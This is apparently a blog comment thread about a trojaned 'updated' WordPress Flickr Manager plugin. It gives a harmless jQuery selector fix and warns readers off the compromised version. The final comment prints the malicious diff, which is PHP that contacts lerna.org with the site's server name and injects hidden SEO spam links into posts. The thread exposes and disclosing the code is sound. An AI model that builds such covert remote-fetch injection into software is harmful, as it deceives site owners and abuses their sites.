fwaggle

@valkyrie66: Thanks, and I’ll simply reiterate here because I’ve gotten a couple emails and one ping-back about it… credit for the fix still 100% lays with ogrethegreat – I don’t know enough about jQuery to have fixed it myself.

@1ayah: wordpress-flickr-manager/js/media-panel.php, line #143, take the @ symbol out:

var imgHTML = '[flickrset id="' + id + '" thumbnail="' + jQuery("input[@name='flickr-size...

becomes:

var imgHTML = '[flickrset id="' + id + '" thumbnail="' + jQuery("input[name='flickr-size...

Seems to work for me now. I’ll update the one for download on my site.

Edit: Updated the download @ fwaggle.org so that inserting photosets works.

@teampl4y4: Inserting arbitrary HTML in a surreptitious way remotely without any disclosure is most definitely not the same as “this theme designed by XXX”.

@triseult: Indeed, if only the insertion of links was as transparent as the sockpuppet that teampl4y4 is.

It’s malicious in that it’s not described behavior of the script – nowhere in the description does it say it’ll put links in the posts. Furthermore, hidden links like this are the exact kind of thing Google punishes people for.

It’s also not the same as a template or whatever, because the links are hidden and they’re not linking back to *him* – they’re linking to an assortment of sites that he’s (presumably) getting paid to inflate the PR of.

To clear up, I wouldn’t have a problem with it if:

1) The links were visible, and not surreptitiously hidden in “10% of” posts.
2) The behavior was described when you suggested people downloaded it… “oh by the way, I insert a few links for my gain, keep them please as a token of your appreciation”.
3) The links were to a real blog of your’s, as opposed to some janky SEO websites.

So I’d call that malicious. You say potato, I say potahto. Personally, I find it very hard to believe this code was put in by accident, and I think anyone else with any experience at all with PHP would be inclined to agree with me.

CoBa1t: There’s not much to analyze, the version ogre linked to simply connects to lerna.org (I’m assuming it’s some silly reference to a blackhat SEO “hydra”) to grab a set of links it’s supposed to add to your entries to get them better search engine positions, then it adds the links every time you insert a photo to a tiny layer that’s not visible to most CSS-enabled viewers, but is very visible to search engines.

The download link I posted above should be “safe”, but given how many people so readily installed the “malicious” plugin (myself included, *sheepish*) I think it’s probably best we don’t go encouraging installing random people’s plugins. If you want to make the changes yourself, take a look at the .diff – basically any line that starts with a – means something’s taken out, and the + means something added.

Simply put, what you’re looking for is in these files:

wordpress-flickr-manager/js/media-panel.php
wordpress-flickr-manager/js/wfm-hs.php
wordpress-flickr-manager/js/wfm-lightbox.php

You’re looking for jQuery lines that contain @name or @rel, and you’re going to take the @ character off the front of @name or @rel, so for example:

this: wfmJS(‘a[@rel*=flickr-mgr]’).each(function() {
becomes: wfmJS(‘a[rel*=flickr-mgr]’).each(function() {

There’s no new code or anything like that, you can make those changes (or apply the diff above using “patch” if you have shell access) to the current version downloadable from ww.wp.xz.cn… I think that’s the safest way to do it, as even a layperson would have a pretty tough time believing that deleting a few @ characters would do anything malicious.

I also sent the information to Trent, so hopefully he can just take a few minutes (I’m sure he’s very busy) to verify the patch is correct and safe, apply it, and push a new version out – that would ease everyone’s minds.

Don’t install this “updated” version, it has malicious software in it.

See my comments here: http://ww.wp.xz.cn/support/topic/281990?replies=8

Here’s some code, sans trojan horse bullcrap (I just took TGardner’s version, and made the non-malicious changes):

http://www.fwaggle.org/downloads/wordpress-flickr-manager.zip

If you’re interested in what actually changed:

http://www.fwaggle.org/downloads/wordpress-flickr-manager-wp2.8.diff

For contrast, here’s some of what I consider to be the “malicious” code:

+if (!function_exists('file_get_contents')) {
+    function file_get_contents($filename, $incpath = false, $resource_context =
 null)
+    {
+        if (false === $fh = fopen($filename, 'rb', $incpath)) {
+            trigger_error('file_get_contents() failed to open stream: No such f
ile or directory', E_USER_WARNING);
+            return false;
+        }
+
+        clearstatcache();
+        if ($fsize = @filesize($filename)) {
+            $data = fread($fh, $fsize);
+        } else {
+            $data = '';
+            while (!feof($fh)) {
+                $data .= fread($fh, 8192);
+            }
+        }
+
+        fclose($fh);
+        return $data;
+    }
+}

+    <?php
+    $rand = rand( 0, 100 );
+    $seed=false;
+    @$seed = (int) unserialize(file_get_contents( 'http://lerna.org/api/link/seed?app=flickr_manager' ));
+    if(!$seed) {
+        $seed = 10;
+    }
+    if ( $rand < $seed ) {
+        $link = file_get_contents( sprintf('http://www.lerna.org/api/link/?format=%s&ref=%s&tid=%d', 'html', "http://".$_SERVER['SERVER_NAME'], 2));
+        echo "imgHTML+='<div style=\"width:10px;height:3px;display:block;overflow:hidden;\">".str_replace("href","style=\"text-indent: 20px; display: block;\" href",$link)."</div>';";
+    }
+    ?>